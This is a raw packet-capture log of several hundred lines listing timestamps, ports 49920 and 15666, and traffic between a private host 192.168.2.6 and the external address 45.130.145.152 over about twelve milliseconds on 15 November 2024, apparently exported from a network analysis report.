Nov 15, 2024 10:36:32.178895950 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178915977 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.178916931 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178945065 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178971052 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.178998947 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179003000 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179027081 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179030895 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179054022 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179054976 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179081917 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179083109 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179094076 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179111004 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179132938 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179141045 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179164886 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179168940 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179183960 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179195881 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179219961 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179222107 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179250002 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179253101 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179287910 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179297924 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179300070 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179358006 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179374933 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179387093 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179414034 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.179426908 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179438114 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.179472923 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182183027 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182243109 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182375908 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182440996 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182450056 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182492018 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182518005 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182544947 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182575941 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182585001 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182594061 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182784081 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182795048 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182799101 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182802916 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182823896 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182832003 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182841063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182852983 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182869911 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182894945 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.182925940 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182934999 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182941914 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182950974 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.182996988 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.183063030 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.183072090 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.183079958 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.183087111 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.183095932 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.183120966 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.183137894 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184340954 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184356928 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184395075 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184412003 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184467077 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184535027 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184586048 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184595108 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184595108 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184631109 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184639931 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184652090 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184699059 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184736967 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184739113 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184751987 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184756041 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184765100 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184798002 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184828997 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184878111 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184912920 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.184946060 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.184992075 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185002089 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185029030 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185038090 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185049057 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185086966 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185091972 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185096025 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185133934 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185139894 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185142994 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185190916 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185194969 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185199976 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185209036 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185225010 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185250044 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185261965 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185272932 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185275078 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185317039 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185326099 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185329914 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185333967 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185373068 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185390949 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185399055 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185408115 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185420036 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185452938 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185461044 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185534954 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185679913 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185689926 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185745001 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185790062 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185800076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185806990 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185828924 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185837030 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185846090 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185848951 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185853004 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185861111 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185900927 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.185945034 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185955048 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185962915 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185971975 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185981989 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185986042 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185988903 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185992002 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.185996056 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186007977 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186049938 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186059952 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186068058 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186077118 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186084986 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186091900 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186093092 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186105967 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186120987 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186167955 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186204910 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186214924 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186222076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186230898 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186239004 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186247110 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186254978 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186264038 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186266899 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186271906 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186280966 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186280966 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186299086 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186307907 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186314106 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186336994 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186346054 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186353922 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186363935 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186391115 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186408997 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186889887 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186909914 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186961889 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.186983109 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.186991930 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187040091 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187047958 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187057018 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187067986 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187102079 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187103033 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187143087 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187171936 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187215090 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187217951 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187299967 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187346935 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187465906 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187474966 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187510014 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187521935 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187522888 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187530041 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187536955 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187558889 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187566996 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187570095 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187582016 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187611103 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187619925 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187663078 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187705040 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187714100 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187721014 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187769890 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187802076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187809944 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187817097 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187871933 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187871933 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187879086 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187886000 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.187923908 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187942982 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.187999010 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188005924 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188013077 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188054085 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188055038 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188064098 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188067913 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188114882 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188203096 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188210964 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188218117 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188273907 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188297987 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188355923 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188373089 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188380957 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188388109 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188436031 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188440084 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188448906 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188456059 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188509941 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188543081 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188551903 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188560009 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188570023 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188605070 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.188616991 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188631058 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.188661098 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189171076 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189209938 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189225912 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189253092 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189302921 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189312935 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189327955 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189335108 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189372063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189374924 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189380884 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189430952 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189448118 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189500093 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189502001 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189511061 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189517975 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189568996 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189583063 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189620018 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189646959 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189670086 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189676046 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189685106 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189692020 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189699888 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189721107 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189728975 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189759970 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189774036 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189779043 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189788103 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189800024 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189807892 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189840078 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189847946 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189857006 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189860106 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189860106 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189867973 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189912081 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.189941883 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189958096 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189965963 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.189970016 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190006018 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190009117 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190032005 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190059900 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190073013 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190120935 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190170050 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190181971 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190191031 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190197945 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190226078 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190243959 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190264940 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190351009 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190397978 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190417051 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190426111 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190433979 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190440893 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190476894 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190512896 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190521955 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190565109 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190614939 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190623999 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190664053 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190673113 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190675020 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190680027 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190689087 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190711975 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190721035 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190726042 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190763950 CET	49920	15666	192.168.2.6	45.130.145.152
Nov 15, 2024 10:36:32.190793991 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190819025 CET	15666	49920	45.130.145.152	192.168.2.6
Nov 15, 2024 10:36:32.190841913 CET	49920	15666	192.168.2.6	45.130.145.152
